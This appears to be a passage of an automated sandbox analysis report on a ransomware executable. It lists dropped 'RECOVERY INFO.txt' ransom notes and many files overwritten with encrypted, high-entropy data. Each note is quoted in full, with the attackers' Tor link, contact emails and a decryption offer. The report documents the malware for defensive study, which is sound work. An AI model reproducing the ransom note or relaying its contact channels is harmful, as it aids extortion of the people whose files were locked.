Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File dropped: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\search-summary\js\nls\zh-cn\RECOVERY INFO.txt -> your data has been encryptedin order to return your files back you need decryption tool1)download tor browser 2)open in tor browser link below and contact with us there:http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsahqohajloyrwspvtjajdzqrftqzolt/dbdcf16d964adf694aa8b335fdbe6265b5544fca2aa13d202a125a57f5d20d76or email: lazylazy@tuta.combackup email: help.service@anche.nolimit for free decryption: 3 files up to 5mb (no database or backups)	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File dropped: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\search-summary\js\nls\zh-tw\RECOVERY INFO.txt -> your data has been encryptedin order to return your files back you need decryption tool1)download tor browser 2)open in tor browser link below and contact with us there:http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsahqohajloyrwspvtjajdzqrftqzolt/dbdcf16d964adf694aa8b335fdbe6265b5544fca2aa13d202a125a57f5d20d76or email: lazylazy@tuta.combackup email: help.service@anche.nolimit for free decryption: 3 files up to 5mb (no database or backups)	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File dropped: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\pt-br\RECOVERY INFO.txt -> your data has been encryptedin order to return your files back you need decryption tool1)download tor browser 2)open in tor browser link below and contact with us there:http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsahqohajloyrwspvtjajdzqrftqzolt/dbdcf16d964adf694aa8b335fdbe6265b5544fca2aa13d202a125a57f5d20d76or email: lazylazy@tuta.combackup email: help.service@anche.nolimit for free decryption: 3 files up to 5mb (no database or backups)	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File dropped: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\pl-pl\RECOVERY INFO.txt -> your data has been encryptedin order to return your files back you need decryption tool1)download tor browser 2)open in tor browser link below and contact with us there:http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsahqohajloyrwspvtjajdzqrftqzolt/dbdcf16d964adf694aa8b335fdbe6265b5544fca2aa13d202a125a57f5d20d76or email: lazylazy@tuta.combackup email: help.service@anche.nolimit for free decryption: 3 files up to 5mb (no database or backups)	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File dropped: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\pl-pl\RECOVERY INFO.txt -> your data has been encryptedin order to return your files back you need decryption tool1)download tor browser 2)open in tor browser link below and contact with us there:http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsahqohajloyrwspvtjajdzqrftqzolt/dbdcf16d964adf694aa8b335fdbe6265b5544fca2aa13d202a125a57f5d20d76or email: lazylazy@tuta.combackup email: help.service@anche.nolimit for free decryption: 3 files up to 5mb (no database or backups)	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File dropped: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\search-summary\js\nls\sl-sl\RECOVERY INFO.txt -> your data has been encryptedin order to return your files back you need decryption tool1)download tor browser 2)open in tor browser link below and contact with us there:http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsahqohajloyrwspvtjajdzqrftqzolt/dbdcf16d964adf694aa8b335fdbe6265b5544fca2aa13d202a125a57f5d20d76or email: lazylazy@tuta.combackup email: help.service@anche.nolimit for free decryption: 3 files up to 5mb (no database or backups)	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File dropped: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\pt-br\RECOVERY INFO.txt -> your data has been encryptedin order to return your files back you need decryption tool1)download tor browser 2)open in tor browser link below and contact with us there:http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsahqohajloyrwspvtjajdzqrftqzolt/dbdcf16d964adf694aa8b335fdbe6265b5544fca2aa13d202a125a57f5d20d76or email: lazylazy@tuta.combackup email: help.service@anche.nolimit for free decryption: 3 files up to 5mb (no database or backups)	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File dropped: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\search-summary\js\nls\sv-se\RECOVERY INFO.txt -> your data has been encryptedin order to return your files back you need decryption tool1)download tor browser 2)open in tor browser link below and contact with us there:http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsahqohajloyrwspvtjajdzqrftqzolt/dbdcf16d964adf694aa8b335fdbe6265b5544fca2aa13d202a125a57f5d20d76or email: lazylazy@tuta.combackup email: help.service@anche.nolimit for free decryption: 3 files up to 5mb (no database or backups)	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File dropped: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\ro-ro\RECOVERY INFO.txt -> your data has been encryptedin order to return your files back you need decryption tool1)download tor browser 2)open in tor browser link below and contact with us there:http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsahqohajloyrwspvtjajdzqrftqzolt/dbdcf16d964adf694aa8b335fdbe6265b5544fca2aa13d202a125a57f5d20d76or email: lazylazy@tuta.combackup email: help.service@anche.nolimit for free decryption: 3 files up to 5mb (no database or backups)	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File dropped: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\search-summary\js\nls\tr-tr\RECOVERY INFO.txt -> your data has been encryptedin order to return your files back you need decryption tool1)download tor browser 2)open in tor browser link below and contact with us there:http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsahqohajloyrwspvtjajdzqrftqzolt/dbdcf16d964adf694aa8b335fdbe6265b5544fca2aa13d202a125a57f5d20d76or email: lazylazy@tuta.combackup email: help.service@anche.nolimit for free decryption: 3 files up to 5mb (no database or backups)	Jump to dropped file

Writes many files with high entropy

Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\chrome_100_percent.pak entropy: 7.99972157706	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe entropy: 7.99559842063	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatRes.dll entropy: 7.99999027504	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe entropy: 7.99943763961	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe entropy: 7.9999451581	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\Assets\9c09c81a3293a6f9820cb9d43546c552972469999723291e28c55f33c87de532 entropy: 7.99953699082	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\chrome_200_percent.pak entropy: 7.99977671923	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\Assets\8c939f6ee06ca9717f7931e0accddd517b5609c30d56d0f8b83436eed1c18bb0 entropy: 7.99930818189	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\chrome_elf.dll entropy: 7.99985687655	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\Assets\8e880d7bb6ea337763272a03a43b29bbf6d776b389e773d2ea88f49e781bc7d9 entropy: 7.9988720778	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\Assets\921ae2be6f2c0c4f5d0612de464ac6be9b75354010d4c8c367cf25fe0bff1b16 entropy: 7.99744660153	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\COPYING.LGPLv2.1.txt entropy: 7.99350533667	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\icudtl.dat entropy: 7.99998450782	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe entropy: 7.99993514167	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\Assets\b3a5292904d011b22b8911cbdfc6f842a99f6f0814b738a7235ad3a269e258a4 entropy: 7.99960404887	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\Assets\bb0f587a0db0572a7f0897d4ad538a5fd91259f16df486474df5fa431209bf59 entropy: 7.9994441393	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\locales\en-US.pak entropy: 7.99948323239	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\Assets\9c48d8ef015852b5905a97c1870055d3fa24fe16b9ab57e7f4909593af3e9322 entropy: 7.99959634894	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\Assets\abe617f1af7a43a8c0ef3145e53d5e69b32cca5362f7f2b262c53b1051dc4e1e entropy: 7.99945384551	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\resources.pak entropy: 7.99997629934	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\Assets\e22cc4414d69397e092363fd311bdcb60e201d571917209f69afb053169aeeef entropy: 7.99952819518	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\Assets\ffd5710fd5bff1cd638b7557a0f0b169446159bb972f75fe422e6eb3a2b043be entropy: 7.99951652986	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\314559\1696333703 entropy: 7.99693058231	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\338387\1696408273 entropy: 7.99610942344	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\338387\1696420884 entropy: 7.99603129503	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_WindowsAlarms_8wekyb3d8bbwe!App entropy: 7.99512715955	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_WindowsSoundRecorder_8wekyb3d8bbwe!App entropy: 7.99481367213	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_WindowsStore_8wekyb3d8bbwe!App entropy: 7.99451653038	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_WindowsCalculator_8wekyb3d8bbwe!App entropy: 7.99505265413	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Windows_Explorer entropy: 7.99522099765	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Windows_MediaPlayer32 entropy: 7.99531039351	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Windows_AdministrativeTools entropy: 7.9954171701	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Windows_Computer entropy: 7.99455698021	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Windows_ControlPanel entropy: 7.99532698994	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Windows_RemoteDesktop entropy: 7.99474015618	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Windows_Photos_8wekyb3d8bbwe!App entropy: 7.99386998055	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Windows_Shell_RunDialog entropy: 7.99466450473	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_cleanmgr_exe entropy: 7.9950766422	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_cmd_exe entropy: 7.99554295732	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\ProgramData\USOPrivate\UpdateStore\store.db entropy: 7.99998577804	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\MSEdge entropy: 7.99509973664	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_comexp_msc entropy: 7.99569161612	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_magnify_exe entropy: 7.9954153521	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_dfrgui_exe entropy: 7.99430526978	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_iscsicpl_exe entropy: 7.99517754125	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_msconfig_exe entropy: 7.99410244104	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_msinfo32_exe entropy: 7.99373983415	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_charmap_exe entropy: 7.99547961522	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_MdSched_exe entropy: 7.99550978151	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_odbcad32_exe entropy: 7.99453368476	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_narrator_exe entropy: 7.99500829729	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\ProgramData\Microsoft\User Account Pictures\guest.bmp entropy: 7.9997140245	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\ProgramData\Microsoft\User Account Pictures\user.bmp entropy: 7.99969166356	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_mspaint_exe entropy: 7.99503742173	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_psr_exe entropy: 7.99481237127	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_quickassist_exe entropy: 7.99484163934	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_printmanagement_msc entropy: 7.99470729912	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_RecoveryDrive_exe entropy: 7.9944782001	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_services_msc entropy: 7.99384963711	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_notepad_exe entropy: 7.99503207683	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\ProgramData\Microsoft\Windows Security Health\Logs\SHS-10032023-100634-7-7f-19041.1.amd64fre.vb_release.191206-1406.etl entropy: 7.99112777195	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_osk_exe entropy: 7.99467351336	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_WF_msc entropy: 7.99508649032	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_WindowsPowerShell_v1_0_powershell_exe entropy: 7.99491223718	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_WindowsPowerShell_v1_0_PowerShell_ISE_exe entropy: 7.99463345617	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{6D809377-6AF0-444B-8957-A3773F02200E}_7-Zip_7-zip_chm entropy: 7.99515118395	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_SnippingTool_exe entropy: 7.99480999386	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\ProgramData\Microsoft\Windows Security Health\Logs\SHS-10032023-114538-7-7f-19041.1.amd64fre.vb_release.191206-1406.etl entropy: 7.99535959301	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_WFS_exe entropy: 7.99504301156	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\ProgramData\Microsoft\Windows Security Health\Logs\SHS-10032023-120948-7-7f-19041.1.amd64fre.vb_release.191206-1406.etl entropy: 7.9935856747	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\ProgramData\Microsoft\Windows Security Health\Logs\SHS-10032023-125739-7-7f-19041.1.amd64fre.vb_release.191206-1406.etl entropy: 7.9950928826	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\ProgramData\Microsoft\Windows Security Health\Logs\SHS-10032023-125203-7-7f-19041.1.amd64fre.vb_release.191206-1406.etl entropy: 7.99179545182	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\ProgramData\Microsoft\Windows Security Health\Logs\SHS-10042023-092906-7-7f-19041.1.amd64fre.vb_release.191206-1406.etl entropy: 7.99252562177	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{6D809377-6AF0-444B-8957-A3773F02200E}_Windows NT_Accessories_wordpad_exe entropy: 7.99503438603	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_AutoIt3_Au3Info_exe entropy: 7.99527433979	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_AutoIt3_Au3Info_x64_exe entropy: 7.99510873069	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{6D809377-6AF0-444B-8957-A3773F02200E}_7-Zip_7zFM_exe entropy: 7.99437109439	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{6D809377-6AF0-444B-8957-A3773F02200E}_Adobe_Acrobat DC_Acrobat_Acrobat_exe entropy: 7.9950534155	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\ProgramData\Microsoft\Windows Security Health\Logs\SHS-10042023-100200-7-7f-19041.1.amd64fre.vb_release.191206-1406.etl entropy: 7.99494061925	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\ProgramData\Microsoft\Windows Security Health\Logs\SHS-10042023-093652-7-7f-19041.1.amd64fre.vb_release.191206-1406.etl entropy: 7.99687282116	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{6D809377-6AF0-444B-8957-A3773F02200E}_Common Files_Microsoft Shared_Ink_mip_exe entropy: 7.99478144595	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\ProgramData\Microsoft\Windows Security Health\Logs\SHS-10042023-115204-7-7f-19041.1.amd64fre.vb_release.191206-1406.etl entropy: 7.99393937985	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\ProgramData\Package Cache\{8bdfe669-9705-4184-9368-db9ce581e0e7}\VC_redist.x64.exe entropy: 7.99971298097	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\314559\5091e1ba9bca4548a55e05605447918b_1 entropy: 7.99511096682	Jump to dropped file
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\TargetedContentCache\v3\314559\71dd91a867a24f4a8b8f55514985d2cc_1 entropy: 7.99454410272	Jump to dropped file
